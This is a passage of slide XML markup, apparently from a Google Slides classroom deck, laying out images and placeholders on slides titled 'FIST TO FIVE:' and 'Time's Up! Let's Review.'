            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2156" name="Google Shape;2156;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7347100"/>
            <a:ext cx="1389526" cy="1056316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2157" name="Google Shape;2157;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8740767"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2158" name="Google Shape;2158;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2159" name="Google Shape;2159;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615"/>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21"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="122" name="Google Shape;122;p37"/>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23" name="Google Shape;123;p37"/>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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="9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24" name="Google Shape;124;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="138" r="148"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354260" y="3554200"/>
            <a:ext cx="3656648" cy="5338703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p3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3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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2161" name="Google Shape;2161;p143"/>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62" name="Google Shape;2162;p143"/>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163" name="Google Shape;2163;p143"/>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164" name="Google Shape;2164;p14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65" name="Google Shape;2165;p143"/>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166" name="Google Shape;2166;p1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67" name="Google Shape;2167;p143"/>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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65583" y="10328200"/>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69" name="Google Shape;2169;p143"/>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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11496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1" name="Google Shape;2171;p143"/>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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400" y="7991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3" name="Google Shape;2173;p143"/>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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9159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5" name="Google Shape;2175;p143"/>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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65916" y="5694333"/>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7" name="Google Shape;2177;p143"/>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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6862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9" name="Google Shape;2179;p143"/>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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3357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81" name="Google Shape;2181;p143"/>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143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525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183" name="Google Shape;2183;p143"/>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84" name="Google Shape;2184;p143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559808"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2185" name="Google Shape;2185;p143"/>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86" name="Google Shape;2186;p143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="6872808"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2187" name="Google Shape;2187;p143"/>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88" name="Google Shape;2188;p143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9168384"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2189" name="Google Shape;2189;p143"/>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0" name="Google Shape;2190;p143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2192" name="Google Shape;2192;p144"/>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93" name="Google Shape;2193;p144"/>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194" name="Google Shape;2194;p144"/>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195" name="Google Shape;2195;p14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96" name="Google Shape;2196;p144"/>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197" name="Google Shape;2197;p1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98" name="Google Shape;2198;p144"/>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144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65583" y="10328200"/>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0" name="Google Shape;2200;p144"/>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144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11496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2" name="Google Shape;2202;p144"/>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144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400" y="7991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4" name="Google Shape;2204;p144"/>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144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9159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6" name="Google Shape;2206;p144"/>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144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65916" y="5694333"/>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8" name="Google Shape;2208;p144"/>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144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6862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10" name="Google Shape;2210;p144"/>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144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3357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12" name="Google Shape;2212;p144"/>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144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525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214" name="Google Shape;2214;p144"/>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15" name="Google Shape;2215;p144"/>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16" name="Google Shape;2216;p144"/>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17" name="Google Shape;2217;p144"/>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18" name="Google Shape;2218;p144"/>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19" name="Google Shape;2219;p144"/>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0" name="Google Shape;2220;p144"/>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1" name="Google Shape;2221;p144"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2223" name="Google Shape;2223;p145"/>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24" name="Google Shape;2224;p145"/>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225" name="Google Shape;2225;p145"/>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226" name="Google Shape;2226;p14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227" name="Google Shape;2227;p145"/>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228" name="Google Shape;2228;p1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29" name="Google Shape;2229;p145"/>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145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65583" y="10328200"/>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1" name="Google Shape;2231;p145"/>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145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11496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3" name="Google Shape;2233;p145"/>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145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400" y="7991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5" name="Google Shape;2235;p145"/>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145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9159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7" name="Google Shape;2237;p145"/>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145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65916" y="5694333"/>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9" name="Google Shape;2239;p145"/>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145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6862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41" name="Google Shape;2241;p145"/>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145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3357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43" name="Google Shape;2243;p145"/>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145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525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245" name="Google Shape;2245;p145"/>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46" name="Google Shape;2246;p145"/>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47" name="Google Shape;2247;p145"/>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48" name="Google Shape;2248;p145"/>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49" name="Google Shape;2249;p145"/>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0" name="Google Shape;2250;p145"/>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1" name="Google Shape;2251;p145"/>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2" name="Google Shape;2252;p145"/>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53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2254" name="Google Shape;2254;p146"/>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55" name="Google Shape;2255;p146"/>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256" name="Google Shape;2256;p146"/>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257" name="Google Shape;2257;p14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258" name="Google Shape;2258;p146"/>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259" name="Google Shape;2259;p1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0" name="Google Shape;2260;p14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146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65583" y="10328200"/>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2" name="Google Shape;2262;p14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146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11496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4" name="Google Shape;2264;p14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146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400" y="7991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6" name="Google Shape;2266;p14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146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9159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8" name="Google Shape;2268;p14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146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65916" y="5694333"/>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70" name="Google Shape;2270;p14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146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6862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72" name="Google Shape;2272;p14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146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3357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74" name="Google Shape;2274;p14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146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525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276" name="Google Shape;2276;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3364992"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2277" name="Google Shape;2277;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559808"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2278" name="Google Shape;2278;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5677992"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2279" name="Google Shape;2279;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="6872808"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2280" name="Google Shape;2280;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7997952"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2281" name="Google Shape;2281;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9168384"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2282" name="Google Shape;2282;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10338816"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2283" name="Google Shape;2283;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>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84"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2285" name="Google Shape;2285;p147"/>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2286" name="Google Shape;2286;p147"/>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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>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87" name="Google Shape;2287;p14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88" name="Google Shape;2288;p14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289" name="Google Shape;2289;p147"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206222" y="2052600"/>
            <a:ext cx="19965207" cy="4949711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2290" name="Google Shape;2290;p147"/>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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>FIST TO FIVE:</a:t>
            </a:r>
            <a:endParaRPr sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2291" name="Google Shape;2291;p147"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146399" y="8818867"/>
            <a:ext cx="12084899"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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2293" name="Google Shape;2293;p14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294" name="Google Shape;2294;p14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95" name="Google Shape;2295;p14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96" name="Google Shape;2296;p148"/>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time’s Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
